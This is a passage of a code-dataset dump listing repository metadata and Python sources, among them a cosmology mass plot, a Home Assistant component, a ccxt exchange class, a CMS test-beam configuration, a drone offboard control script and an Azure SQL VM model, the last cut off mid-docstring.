blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
288
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 684
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 25
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 128
12.7k
| extension
stringclasses 142
values | content
stringlengths 128
8.19k
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
9fe14f76ed7f167080c56d6ae5377451ea028db9
|
607241e619ca499121106b218a5e00ac5244bda3
|
/analysis/zeldovich_enzo_mass.py
|
808a1269774d71bef4bd037a05e3c33e5614d2a5
|
[] |
no_license
|
bvillasen/cosmo_sims
|
37caea950c7be0626a5170333bfe734071c58124
|
8b20dc05842a22ea50ceb3d646037d2e66fc8c9b
|
refs/heads/master
| 2020-04-22T23:22:28.670894 | 2020-01-02T23:32:39 | 2020-01-02T23:32:39 | 114,167,239 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,713 |
py
|
import sys
import numpy as np
import matplotlib.pyplot as plt
import h5py as h5
import yt
dev_dir = '/home/bruno/Desktop/Dropbox/Developer/'
cosmo_dir = dev_dir + 'cosmo_sims/'
toolsDirectory = cosmo_dir + "tools/"
sys.path.extend([toolsDirectory ] )
from load_data_cholla import load_snapshot_data
from internal_energy import get_internal_energy, get_temp, get_Temperaure_From_Flags_DE
# from load_data_enzo import load_snapshot_enzo
from cosmo_constants import *
from tools import create_directory
from mpi4py import MPI
comm = MPI.COMM_WORLD
rank = comm.Get_rank()
nSnap = rank
# rank = 0
dataDir = '/raid/bruno/data/'
# dataDir = '/home/bruno/Desktop/data/'
data_set = 'enzo_simple_beta_convDE'
startSnap = 27
enzoDir = dataDir + 'cosmo_sims/enzo/ZeldovichPancake_HLLC/'
outDir = dev_dir + 'figures/zeldovich_mass/'
if rank == 0:
create_directory( outDir )
a_list = []
gamma = 5./3
j_indx = 0
i_indx = 0
L = 64.
n = 256
dx = L / ( n )
x = np.arange(0, 256, 1)* dx + 0.5*dx
dv = (dx*1e3)**3
chollaDir_0 = dataDir + 'cosmo_sims/cholla_pm/zeldovich/data_PLMC_HLLC_VL_eta0.001_0.030_z1/'
chollaDir_1 = dataDir + 'cosmo_sims/cholla_pm/zeldovich/data_PLMP_HLLC_VL_eta0.001_0.030_z1/'
chollaDir_2 = dataDir + 'cosmo_sims/cholla_pm/zeldovich/data_PPMC_HLLC_VL_eta0.001_0.030_z1_ic0/'
chollaDir_3 = dataDir + 'cosmo_sims/cholla_pm/zeldovich/data_PPMP_HLLC_VL_eta0.001_0.030_z1_ic64/'
chollaDir_4 = dataDir + 'cosmo_sims/cholla_pm/zeldovich/data_PPMP_HLLC_VL_eta0.001_0.030_z1_ic32/'
chollaDir_5 = dataDir + 'cosmo_sims/cholla_pm/zeldovich/data_PPMP_HLLC_VL_eta0.001_0.030_z1_ic4/'
chollaDir_6 = dataDir + 'cosmo_sims/cholla_pm/zeldovich/data_PPMP_HLLC_VL_eta0.001_0.030_z1_ic0/'
# chollaDir_3 = dataDir + 'cosmo_sims/cholla_pm/zeldovich/data_PPMC_HLLC_VL_eta0.001_0.030_z1_signStone/'
dir_list = [ chollaDir_0, chollaDir_1, chollaDir_2, chollaDir_3, chollaDir_4, chollaDir_5, chollaDir_6 ]
labels = ['PLMC', 'PLMP', 'PPMC_ic0', 'PPMP_ic64', 'PPMP_ic32', 'PPMP_ic4', 'PPMP_ic0', ]
out_file_name = 'zeldovich_mass.png'
#Plot UVB uvb_rates
nrows=1
ncols = 1
fig, ax = plt.subplots(nrows=nrows, ncols=ncols, figsize=(10*ncols,8*nrows))
lw = 3
for i,chollaDir in enumerate(dir_list):
print chollaDir
mass = []
z = []
for nSnap in range(50):
data_cholla = load_snapshot_data( nSnap, chollaDir )
current_z = data_cholla['current_z']
dens_ch = data_cholla['gas']['density'][...]
mass_tot = dens_ch.sum() / dv
z.append(current_z)
mass.append( mass_tot )
# print mass
ax.plot( z, mass, label=labels[i] )
ax.legend()
ax.set_xlabel('Redshift')
ax.set_ylabel(r'Mass [$\mathrm{M}_{\odot}/h$ ]')
fig.savefig( outDir+out_file_name, bbox_inches='tight', dpi=100)
|
[
"[email protected]"
] | |
921a1439c4b41746c803c1027e09f0d1502c2b93
|
55dc6e337e634acb852c570274a1d0358b7300a5
|
/tests/core/intz/intz.py
|
32ff67f7a362dffe3e6e8699ccb651f1b494c791
|
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
fifoteam/veriloggen
|
97ad45671f053c85f495b08a030f735fd9822146
|
23cb7251c0f126d40d249982cad33ef37902afef
|
refs/heads/master
| 2020-05-27T00:28:37.575411 | 2017-02-20T01:47:00 | 2017-02-20T01:47:00 | 82,518,602 | 2 | 0 | null | 2017-02-20T05:02:37 | 2017-02-20T05:02:37 | null |
UTF-8
|
Python
| false | false | 989 |
py
|
from __future__ import absolute_import
from __future__ import print_function
import sys
import os
# the next line can be removed after installation
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))))
from veriloggen import *
def mkLed():
m = Module('blinkled')
width = m.Parameter('WIDTH', 8)
clk = m.Input('CLK')
rst = m.Input('RST')
led = m.OutputReg('LED', width)
count = m.Reg('count', 32)
m.Always(Posedge(clk))(
If(rst)(
count(0)
).Else(
If(count == 1023)(
count(0)
).Else(
count(count + 1)
)
))
m.Always(Posedge(clk))(
If(rst)(
led(0)
).Else(
If(count == 1024 - 1)(
led(IntZ())
)
))
return m
if __name__ == '__main__':
led = mkLed()
verilog = led.to_verilog('')
print(verilog)
|
[
"[email protected]"
] | |
daf504ddb048bd9ff53c1be218bdef13eb0e3612
|
978d8f24f4985c61c2dce534a279abe6ffeff433
|
/custom_components/blueprint/__init__.py
|
7f90a41bded995d9a9e736289b3e45a104db0064
|
[
"MIT"
] |
permissive
|
JiriKursky/blueprint
|
3c1ad02c4726539ab07fc407b6c53ef4c903448b
|
92ae97dc5fec3a9a6e6e14031c32bbf2f1953ff6
|
refs/heads/master
| 2022-01-27T16:24:27.521422 | 2019-07-20T10:52:46 | 2019-07-20T10:52:46 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,577 |
py
|
"""
Component to integrate with blueprint.
For more details about this component, please refer to
https://github.com/custom-components/blueprint
"""
import os
from datetime import timedelta
import logging
import voluptuous as vol
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers import discovery
from homeassistant.util import Throttle
from .const import (
CONF_BINARY_SENSOR,
CONF_ENABLED,
CONF_NAME,
CONF_PASSWORD,
CONF_SENSOR,
CONF_SWITCH,
CONF_USERNAME,
DEFAULT_NAME,
DOMAIN_DATA,
DOMAIN,
ISSUE_URL,
PLATFORMS,
REQUIRED_FILES,
STARTUP,
VERSION,
)
MIN_TIME_BETWEEN_UPDATES = timedelta(seconds=30)
_LOGGER = logging.getLogger(__name__)
BINARY_SENSOR_SCHEMA = vol.Schema(
{
vol.Optional(CONF_ENABLED, default=True): cv.boolean,
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
}
)
SENSOR_SCHEMA = vol.Schema(
{
vol.Optional(CONF_ENABLED, default=True): cv.boolean,
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
}
)
SWITCH_SCHEMA = vol.Schema(
{
vol.Optional(CONF_ENABLED, default=True): cv.boolean,
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
}
)
CONFIG_SCHEMA = vol.Schema(
{
DOMAIN: vol.Schema(
{
vol.Optional(CONF_USERNAME): cv.string,
vol.Optional(CONF_PASSWORD): cv.string,
vol.Optional(CONF_BINARY_SENSOR): vol.All(
cv.ensure_list, [BINARY_SENSOR_SCHEMA]
),
vol.Optional(CONF_SENSOR): vol.All(cv.ensure_list, [SENSOR_SCHEMA]),
vol.Optional(CONF_SWITCH): vol.All(cv.ensure_list, [SWITCH_SCHEMA]),
}
)
},
extra=vol.ALLOW_EXTRA,
)
async def async_setup(hass, config):
"""Set up this component."""
# Import client from a external python package hosted on PyPi
from sampleclient.client import Client
# Print startup message
startup = STARTUP.format(name=DOMAIN, version=VERSION, issueurl=ISSUE_URL)
_LOGGER.info(startup)
# Check that all required files are present
file_check = await check_files(hass)
if not file_check:
return False
# Create DATA dict
hass.data[DOMAIN_DATA] = {}
# Get "global" configuration.
username = config[DOMAIN].get(CONF_USERNAME)
password = config[DOMAIN].get(CONF_PASSWORD)
# Configure the client.
client = Client(username, password)
hass.data[DOMAIN_DATA]["client"] = BlueprintData(hass, client)
# Load platforms
for platform in PLATFORMS:
# Get platform specific configuration
platform_config = config[DOMAIN].get(platform, {})
# If platform is not enabled, skip.
if not platform_config:
continue
for entry in platform_config:
entry_config = entry
# If entry is not enabled, skip.
if not entry_config[CONF_ENABLED]:
continue
hass.async_create_task(
discovery.async_load_platform(
hass, platform, DOMAIN, entry_config, config
)
)
return True
class BlueprintData:
"""This class handle communication and stores the data."""
def __init__(self, hass, client):
"""Initialize the class."""
self.hass = hass
self.client = client
@Throttle(MIN_TIME_BETWEEN_UPDATES)
async def update_data(self):
"""Update data."""
# This is where the main logic to update platform data goes.
try:
data = self.client.get_data()
self.hass.data[DOMAIN_DATA]["data"] = data
except Exception as error: # pylint: disable=broad-except
_LOGGER.error("Could not update data - %s", error)
async def check_files(hass):
"""Return bool that indicates if all files are present."""
# Verify that the user downloaded all files.
base = "{}/custom_components/{}/".format(hass.config.path(), DOMAIN)
missing = []
for file in REQUIRED_FILES:
fullpath = "{}{}".format(base, file)
if not os.path.exists(fullpath):
missing.append(file)
if missing:
_LOGGER.critical("The following files are missing: %s", str(missing))
returnvalue = False
else:
returnvalue = True
return returnvalue
|
[
"[email protected]"
] | |
e7b1a107e606889f4d2ea63f1cc95c913cd2cef3
|
13800b7827598e76428a335559b7bf11867ec2f0
|
/python/ccxt/async_support/binancecoinm.py
|
62ca72174bcc92699c5987d6f42bca5163a236e1
|
[
"MIT"
] |
permissive
|
ccxt/ccxt
|
b40a0466f5c430a3c0c6026552ae697aa80ba6c6
|
e4065f6a490e6fc4dd7a72b375428b2faa570668
|
refs/heads/master
| 2023-09-04T03:41:29.787733 | 2023-09-03T19:25:57 | 2023-09-03T19:25:57 | 91,253,698 | 30,798 | 8,190 |
MIT
| 2023-09-14T21:59:09 | 2017-05-14T15:41:56 |
Python
|
UTF-8
|
Python
| false | false | 1,683 |
py
|
# -*- coding: utf-8 -*-
# PLEASE DO NOT EDIT THIS FILE, IT IS GENERATED AND WILL BE OVERWRITTEN:
# https://github.com/ccxt/ccxt/blob/master/CONTRIBUTING.md#how-to-contribute-code
from ccxt.async_support.binance import binance
from ccxt.abstract.binancecoinm import ImplicitAPI
class binancecoinm(binance, ImplicitAPI):
def describe(self):
return self.deep_extend(super(binancecoinm, self).describe(), {
'id': 'binancecoinm',
'name': 'Binance COIN-M',
'urls': {
'logo': 'https://user-images.githubusercontent.com/1294454/117738721-668c8d80-b205-11eb-8c49-3fad84c4a07f.jpg',
'doc': [
'https://binance-docs.github.io/apidocs/delivery/en/',
'https://binance-docs.github.io/apidocs/spot/en',
],
},
'has': {
'CORS': None,
'spot': False,
'margin': False,
'swap': True,
'future': True,
'option': None,
'createStopMarketOrder': True,
},
'options': {
'fetchMarkets': ['inverse'],
'defaultSubType': 'inverse',
'leverageBrackets': None,
},
})
async def transfer_in(self, code: str, amount, params={}):
# transfer from spot wallet to coinm futures wallet
return await self.futuresTransfer(code, amount, 3, params)
async def transfer_out(self, code: str, amount, params={}):
# transfer from coinm futures wallet to spot wallet
return await self.futuresTransfer(code, amount, 4, params)
|
[
"[email protected]"
] | |
7163f816dfd5db84ab30220ee8fb101ce0b68c6c
|
66e6360325b781ed0791868765f1fd8a6303726f
|
/TB2009/WorkDirectory/5173 Pulse Timing/Pion_108538.py
|
e53460495e0c5366f4f533ec68de84b6c0a8447d
|
[] |
no_license
|
alintulu/FHead2011PhysicsProject
|
c969639b212d569198d8fce2f424ce866dcfa881
|
2568633d349810574354ad61b0abab24a40e510e
|
refs/heads/master
| 2022-04-28T14:19:30.534282 | 2020-04-23T17:17:32 | 2020-04-23T17:17:32 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,320 |
py
|
import FWCore.ParameterSet.Config as cms
process = cms.Process("EventDisplay")
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(-1)
)
process.source = cms.Source("HcalTBSource",
fileNames = cms.untracked.vstring("file:/tmp/chenyi/HTB_108538.root"),
streams = cms.untracked.vstring('Chunk699', 'HCAL_Trigger', 'HCAL_SlowData', 'HCAL_QADCTDC', 'HCAL_DCC021')
)
process.tbunpack = cms.EDFilter("HcalTBObjectUnpacker",
#IncludeUnmatchedHits = cms.untracked.bool(False),
HcalTriggerFED = cms.untracked.int32(1),
HcalVLSBFED = cms.untracked.int32(699),
HcalTDCFED = cms.untracked.int32(8),
HcalQADCFED = cms.untracked.int32(8),
HcalSlowDataFED = cms.untracked.int32(3),
ConfigurationFile = cms.untracked.string('configQADCTDC_TB2009.txt')
)
process.vlsbinfo = cms.EDProducer("VLSBInformationProducer",
minSample = cms.untracked.uint32(0),
maxSample = cms.untracked.uint32(31),
baselineSamples = cms.untracked.uint32(2),
mip = cms.untracked.string("MIP_EarlyRejection.txt"),
useMotherBoard0 = cms.untracked.bool(True),
useMotherBoard1 = cms.untracked.bool(False),
useMotherBoard2 = cms.untracked.bool(False),
useMotherBoard3 = cms.untracked.bool(False),
usePedestalMean = cms.untracked.bool(False)
)
process.ABCcut = cms.EDFilter("SingleTowerParticleFilter")
process.hitcut = cms.EDFilter("HitXFilter",
maximum = cms.untracked.double(-5)
)
process.MessageLogger = cms.Service("MessageLogger",
default = cms.untracked.PSet(
reportEvery = cms.untracked.int32(100)
)
)
process.alignpion2 = cms.EDAnalyzer("AlignPulseAnalyzer",
rejectionSample = cms.untracked.int32(2),
rejectionHeight = cms.untracked.double(0.1),
output = cms.untracked.string("Time_108538_2.root"),
maxsample = cms.untracked.double(1000),
minsample = cms.untracked.double(15)
)
process.alignpion1 = cms.EDAnalyzer("AlignPulseAnalyzer",
rejectionSample = cms.untracked.int32(2),
rejectionHeight = cms.untracked.double(0.1),
output = cms.untracked.string("Time_108538_1.root"),
maxsample = cms.untracked.double(40),
minsample = cms.untracked.double(0)
)
process.p = cms.Path(
process.tbunpack *
process.ABCcut *
process.vlsbinfo *
process.hitcut *
process.alignpion1 *
process.alignpion2
)
|
[
"[email protected]"
] | |
ddb0511c7da10557a74469f32fdf621eef3c6942
|
3a093f6a40e8fb24957d277ad8f4b097d08c6d04
|
/result_scons/tools/cards.py
|
289cbf4c6c50e49e16d0902fa369f486a474e093
|
[] |
no_license
|
dlont/FourTops2016
|
ab9e953760e93b0e777b23478938efd30d640286
|
88c929bf98625735a92a31210f7233f799c5a10c
|
refs/heads/master
| 2021-01-18T22:23:52.796080 | 2019-07-31T12:34:03 | 2019-07-31T12:34:03 | 72,439,490 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,985 |
py
|
#!/usr/bin/env python
"""
Script for Higgs Combine cards creation
"""
import os
import sys
import time
import argparse
import logging
import json
from datetime import datetime
import pandas as pd
import numpy as np
import ROOT
from cards_proc_list import proc_id
from cards_syst_list import systtypelist
from cards_syst_list import syst_norm_size_list, syst_shape_size_list
from cards_bin_list import binlist
#Global definitions
def getObservation(ch,file,observable):
'''
Fill per-bin datacounts list
'''
logging.debug("----getObservation:-----")
obs = {ch:{}}
for ibin in binlist[ch]:
histname = ibin.replace(ch,'') #Remove channel prefix e.g. mu6J2M->6J2M
histname = histname + '/' + observable
logging.debug("Observations filename: "+file.GetName())
logging.debug("Observations histname: "+histname)
integral = file.Get(histname).Integral()
logging.debug("Integral: "+str(integral))
obs[ch][ibin]=integral
return obs
def mcRate(ch,files,observable):
'''
Get MC predictions for each process
'''
logging.debug("----mcRate:-----")
rate = {}
logging.debug(files)
for proc in proc_id.keys():
rate[proc]=getObservation(ch,files[proc],observable)
return rate
def printCardHeader(arguments):
print >> arguments.outfile, '#',str(datetime.now()), arguments
print >> arguments.outfile, '-'*100
print >> arguments.outfile, 'imax', len(binlist[arguments.channel])
print >> arguments.outfile, 'jmax', len(proc_id)-1
print >> arguments.outfile, 'kmax', '*'
print >> arguments.outfile, '-'*100
def printShapeFilesBlock(arguments):
print >> arguments.outfile, '-'*100
for ibin in binlist[arguments.channel]:
histname = ibin.replace(arguments.channel,'')
histname = histname + '/' + arguments.observable
logging.debug(histname)
print >> arguments.outfile, 'shapes', 'data_obs', ibin, arguments.data, histname
for proc in proc_id.keys():
filename = arguments.sources[proc]
logging.debug(filename)
systname = ibin.replace(arguments.channel,'')+'_$SYSTEMATIC/'+arguments.observable
print >> arguments.outfile, 'shapes', proc, ibin, \
filename, histname, systname
print >> arguments.outfile, '-'*100
return
def main(arguments):
#pandas printing setting
pd.set_option('expand_frame_repr', False)
pd.set_option('max_columns', 999)
#Read-in input ROOT files
files = {}
for proc in arguments.sources.keys():
files[proc] = ROOT.TFile.Open(arguments.sources[proc],"READ")
printCardHeader(arguments)
printShapeFilesBlock(arguments)
#Get observations
datafile = ROOT.TFile.Open(arguments.data,"READ")
obs = getObservation(arguments.channel, datafile,arguments.observable)
logging.debug( obs )
#Printout observation block to file
obsline = pd.DataFrame(obs[arguments.channel], columns=binlist[arguments.channel], index=['observation'])
print >> arguments.outfile, '-'*100
print >> arguments.outfile, 'bin', obsline
print >> arguments.outfile, '-'*100
#Get MC rate predictions
rate = mcRate(arguments.channel,files,arguments.observable)
logging.debug( rate )
ch_dfs = []
for proc in proc_id.keys():
#Create new table for given process
s = pd.DataFrame('NA',
columns=binlist[arguments.channel],
index=systtypelist[arguments.channel].keys()
)
#Fill systematics desctiption for this process
#Normalization
df_update = pd.DataFrame.from_dict(syst_norm_size_list[arguments.channel][proc], orient='index')
df_update.columns = binlist[arguments.channel]
s.update(df_update)
#Shape
df_update = pd.DataFrame.from_dict(syst_shape_size_list[arguments.channel][proc], orient='index')
df_update.columns = binlist[arguments.channel]
s.update(df_update)
#Add process labels and id (first and second line, respectively)
processline = pd.DataFrame(proc, columns=binlist[arguments.channel], index=['process'])
s = pd.concat([s.ix[:0], processline, s.ix[0:]])
processline = pd.DataFrame(proc_id[proc], columns=binlist[arguments.channel], index=['process '])
s = pd.concat([s.ix[:1], processline, s.ix[1:]])
rateline = pd.DataFrame(rate[proc][arguments.channel], columns=binlist[arguments.channel], index=['rate'])
s = pd.concat([s.ix[:2], rateline, s.ix[2:]])
print arguments.channel, proc
logging.debug(s)
ch_dfs.append(s)
result = pd.concat(ch_dfs,axis=1)
#Add column with systematic type (normalization or shape)
lam = lambda x: systtypelist[arguments.channel][x] if x in systtypelist[arguments.channel] else ''
result.insert(0,' ',result.index.map(lam))
#Printout MC (rate and systematics) block to file
print >> arguments.outfile, 'bin', result
return 0
if __name__ == '__main__':
start_time = time.time()
parser = argparse.ArgumentParser(
description=__doc__,
formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument('--data', help="Data rootfile", required=True)
parser.add_argument("--source", type=json.loads, dest='sources',
help='json dictionary with input definition', required=True)
parser.add_argument('--channel', help="channel",default='mu')
parser.add_argument('--observable', help="observable",default='allSF/bdt')
parser.add_argument('-o', '--outfile', help="Output file",
default=sys.stdout, type=argparse.FileType('w'))
parser.add_argument(
'-d', '--debug',
help="Print lots of debugging statements",
action="store_const", dest="loglevel", const=logging.DEBUG,
default=logging.WARNING,
)
parser.add_argument(
'-v', '--verbose',
help="Be verbose",
action="store_const", dest="loglevel", const=logging.INFO,
)
args = parser.parse_args(sys.argv[1:])
print(args)
logging.basicConfig(level=args.loglevel)
logging.info( time.asctime() )
exitcode = main(args)
logging.info( time.asctime() )
logging.info( 'TOTAL TIME IN MINUTES:' + str((time.time() - start_time) / 60.0))
sys.exit(exitcode)
|
[
"[email protected]"
] | |
1f1529473302b02d543365662b5ea486c153d200
|
0cf7dd2c3c0b28b52f1273e8fe2ea0a87cacc6af
|
/ToLeftandRight.py
|
b17d2c4f0c6445bb843c71a099e74b7f273f481e
|
[] |
no_license
|
EngrDevDom/Everyday-Coding-in-Python
|
61b0e4fcbc6c7f399587deab2fa55763c9d519b5
|
93329ad485a25e7c6afa81d7229147044344736c
|
refs/heads/master
| 2023-02-25T05:04:50.051111 | 2021-01-30T02:43:40 | 2021-01-30T02:43:40 | 274,971,215 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 422 |
py
|
# ToLeftandRight.py
nums = []
num_of_space = 0
current_num = int(input("Enter a number: "))
nums.append(current_num)
while True:
num = int(input("Enter a number: "))
if num > current_num: num_of_space += 1
elif num == current_num: continue
else: num_of_space -= 1
current_num = num
nums.append(" " * num_of_space + str(num))
if num_of_space == 0: break
for num in nums: print(num)
|
[
"[email protected]"
] | |
3cc3eff0e75bc844fb12fcaa253b0afbd4c3e476
|
1a6d5f58a5aaf478e3af1a880f155a2bcbd06aff
|
/PX4/MAVSDK-Python/offboard_velocity_body.py
|
d14407e6d1504bb49547099d1e336c087e9f2eaa
|
[
"MIT"
] |
permissive
|
yingshaoxo/suicide-squad
|
5b8858376bffe9d80e66debbd75e83b6fb6f5b6e
|
cadbd0d48e860a8747b59190fc67a5a114c3462b
|
refs/heads/master
| 2020-11-24T02:46:38.604339 | 2019-10-29T05:47:44 | 2019-10-29T05:47:44 | 227,932,669 | 6 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,055 |
py
|
#!/usr/bin/env python3
"""
Some caveats when attempting to run the examples in non-gps environments:
- `drone.action.arm()` will return a `COMMAND_DENIED` result because the action requires switching
to LOITER mode first, something that is currently not supported in a non-gps environment. You will
need to temporarily disable this part here:
`https://github.com/mavlink/MAVSDK/blob/develop/plugins/action/action_impl.cpp#L61-L65`
- `drone.offboard.stop()` will also return a `COMMAND_DENIED` result because it requires a mode
switch to HOLD, something that is currently not supported in a non-gps environment.
"""
import asyncio
from mavsdk import System
from mavsdk import (OffboardError, VelocityBodyYawspeed)
async def run():
""" Does Offboard control using velocity body coordinates. """
drone = System()
await drone.connect(system_address="udp://:14540")
# Set parameters
await drone.param.set_float_param("MIS_TAKEOFF_ALT", 1.0) # set takeoff height to 1 meter
await drone.param.set_int_param("COM_TAKEOFF_ACT", 0) # hold after takeoff
await drone.param.set_int_param("COM_OBL_ACT", 0) # 0: land if lost offboard signal; 1: hold if lost offboard signal
# Start parallel tasks
asyncio.ensure_future(print_altitude(drone))
print("-- Arming")
await drone.action.arm()
print("-- Setting initial setpoint")
await drone.offboard.set_velocity_body(VelocityBodyYawspeed(0.0, 0.0, 0.0, 0.0))
print("-- Starting offboard")
try:
await drone.offboard.start()
except OffboardError as error:
print(f"Starting offboard mode failed with error code: {error._result.result}")
print("-- Disarming")
await drone.action.disarm()
return
print("-- Turn clock-wise and climb")
await drone.offboard.set_velocity_body(VelocityBodyYawspeed(0.0, 0.0, -1, 0.0))
await asyncio.sleep(5)
print("-- Turn clock-wise and climb")
await drone.offboard.set_velocity_body(VelocityBodyYawspeed(0.0, 0.1, 0.0, 0.0))
await asyncio.sleep(5)
print("-- Wait for a bit")
await drone.offboard.set_velocity_body(VelocityBodyYawspeed(0.0, -0.1, 0.0, 0.0))
await asyncio.sleep(5)
print("-- Wait for a bit")
await drone.offboard.set_velocity_body(VelocityBodyYawspeed(0.0, 0.0, 0.0, 2.0))
await asyncio.sleep(20)
print("-- Stopping offboard")
try:
await drone.offboard.stop()
except OffboardError as error:
print(f"Stopping offboard mode failed with error code: {error._result.result}")
print("-- Landing")
await drone.action.land()
async def print_altitude(drone):
""" Prints the altitude when it changes """
previous_altitude = None
async for position in drone.telemetry.position():
altitude = round(position.relative_altitude_m)
if altitude != previous_altitude:
previous_altitude = altitude
print(f"Altitude: {altitude}")
if __name__ == "__main__":
loop = asyncio.get_event_loop()
loop.run_until_complete(run())
|
[
"[email protected]"
] | |
6c78fccd11b2ca769683b6527aa888e158fea647
|
d9e26e516ab3863b6e7d00c4e3cdecf1af7028eb
|
/src/oaklib/io/streaming_nl_writer.py
|
ecde169932c3e55baa59bfdfd1aef1e274f6109a
|
[
"Apache-2.0"
] |
permissive
|
INCATools/ontology-access-kit
|
2f08a64b7308e8307d1aaac2a81764e7d98b5928
|
8d2a124f7af66fe2e796f9e0ece55585438796a5
|
refs/heads/main
| 2023-08-30T14:28:57.201198 | 2023-08-29T17:40:19 | 2023-08-29T17:40:19 | 475,072,415 | 67 | 15 |
Apache-2.0
| 2023-09-07T01:06:04 | 2022-03-28T15:50:45 |
Jupyter Notebook
|
UTF-8
|
Python
| false | false | 1,152 |
py
|
from dataclasses import dataclass
from linkml_runtime.utils.yamlutils import YAMLRoot
from oaklib.datamodels import obograph
from oaklib.io.streaming_writer import StreamingWriter
from oaklib.utilities.nlp.natual_language_generation import NaturalLanguageGenerator
@dataclass
class StreamingNaturalLanguageWriter(StreamingWriter):
"""
A writer that streams basic line by line reporting info
"""
natural_language_generator: NaturalLanguageGenerator = None
def emit_curie(self, curie, label=None, **kwargs):
self._ensure_init()
self.file.write(self.natural_language_generator.render_entity(curie))
self.file.write("\n")
def emit_obj(self, obj: YAMLRoot):
self._ensure_init()
if isinstance(obj, obograph.LogicalDefinitionAxiom):
self.file.write(self.natural_language_generator.render_logical_definition(obj))
self.file.write("\n")
else:
raise NotImplementedError
def _ensure_init(self):
if self.natural_language_generator is None:
self.natural_language_generator = NaturalLanguageGenerator(self.ontology_interface)
|
[
"[email protected]"
] | |
3cc7c17ee582aaba4ab4d5771286ac2e1ae8b9e8
|
1b45d1162bd60a356844fc4dced068da2e6cc438
|
/Arrays/Merge.py
|
8ee66ae39f1687b433e476fa1b9e3be1d2e31015
|
[
"MIT"
] |
permissive
|
AnkitAvi11/Data-Structures-And-Algorithms
|
de9584e439861254cdce265af789c8b484c01c69
|
703f78819a41d4dd88caf71156a4a515651edc1b
|
refs/heads/master
| 2023-02-19T21:53:39.405934 | 2021-01-24T17:27:21 | 2021-01-24T17:27:21 | 297,752,655 | 6 | 3 |
MIT
| 2021-01-24T17:27:22 | 2020-09-22T19:33:55 |
Python
|
UTF-8
|
Python
| false | false | 669 |
py
|
"""
QUESTION STATEMENT : MERGE TWO SORTED ARRAYS WITHOUT USING ANY EXTRA SPACE
example :
arr1 = {1,3,5,7,9} size = n
arr2 = {2,4,6,8,10} size = m
arr1 after merging = {1,2,3,4,5,6,7,8,9,10}
"""
def mergeArrays(arr : list, arr2 : list) :
i = 0;j = 0;
while i < len(arr) : # O(n)
if arr[i] > arr2[j] :
arr[i], arr2[j] = arr2[j], arr[i] # swapping the elements
arr2.sort() # O(mlog2m)
i+=1
# total complexity = (n*m)log2m
for el in arr2 :
arr.append(el)
if __name__ == '__main__' :
arr = [1,3,5,7,9]
arr2 = [2,4,6,8,10]
mergeArrays(arr, arr2)
print(arr)
|
[
"[email protected]"
] | |
aa27042ddeb0ddff82f1c8f4312778d7feb8da3e
|
cee65c4806593554662330368c799c14ec943454
|
/src/sqlvm-preview/azext_sqlvm_preview/vendored_sdks/sqlvirtualmachine/models/wsfc_domain_profile_py3.py
|
0d7864768ad80fab17f0ea7f8ca57ea27cec3b41
|
[
"LicenseRef-scancode-generic-cla",
"MIT"
] |
permissive
|
azclibot/azure-cli-extensions
|
d5d1a4ecdfc87fd79f5ad042fb85cdbf881897d2
|
c230646258d4b56efb7d44eb7a0230f2943da6f6
|
refs/heads/master
| 2023-08-28T03:55:02.311902 | 2019-04-04T16:05:45 | 2019-04-04T16:05:45 | 179,548,695 | 1 | 1 |
MIT
| 2021-07-28T15:26:17 | 2019-04-04T17:54:39 |
Python
|
UTF-8
|
Python
| false | false | 3,274 |
py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class WsfcDomainProfile(Model):
"""Active Directory account details to operate Windows Server Failover
Cluster.
:param domain_fqdn: Fully qualified name of the domain.
:type domain_fqdn: str
:param ou_path: Organizational Unit path in which the nodes and cluster
will be present.
:type ou_path: str
:param cluster_bootstrap_account: Account name used for creating cluster
(at minimum needs permissions to 'Create Computer Objects' in domain).
:type cluster_bootstrap_account: str
:param cluster_operator_account: Account name used for operating cluster
i.e. will be part of administrators group on all the participating virtual
machines in the cluster.
:type cluster_operator_account: str
:param sql_service_account: Account name under which SQL service will run
on all participating SQL virtual machines in the cluster.
:type sql_service_account: str
:param file_share_witness_path: Optional path for fileshare witness.
:type file_share_witness_path: str
:param storage_account_url: Fully qualified ARM resource id of the witness
storage account.
:type storage_account_url: str
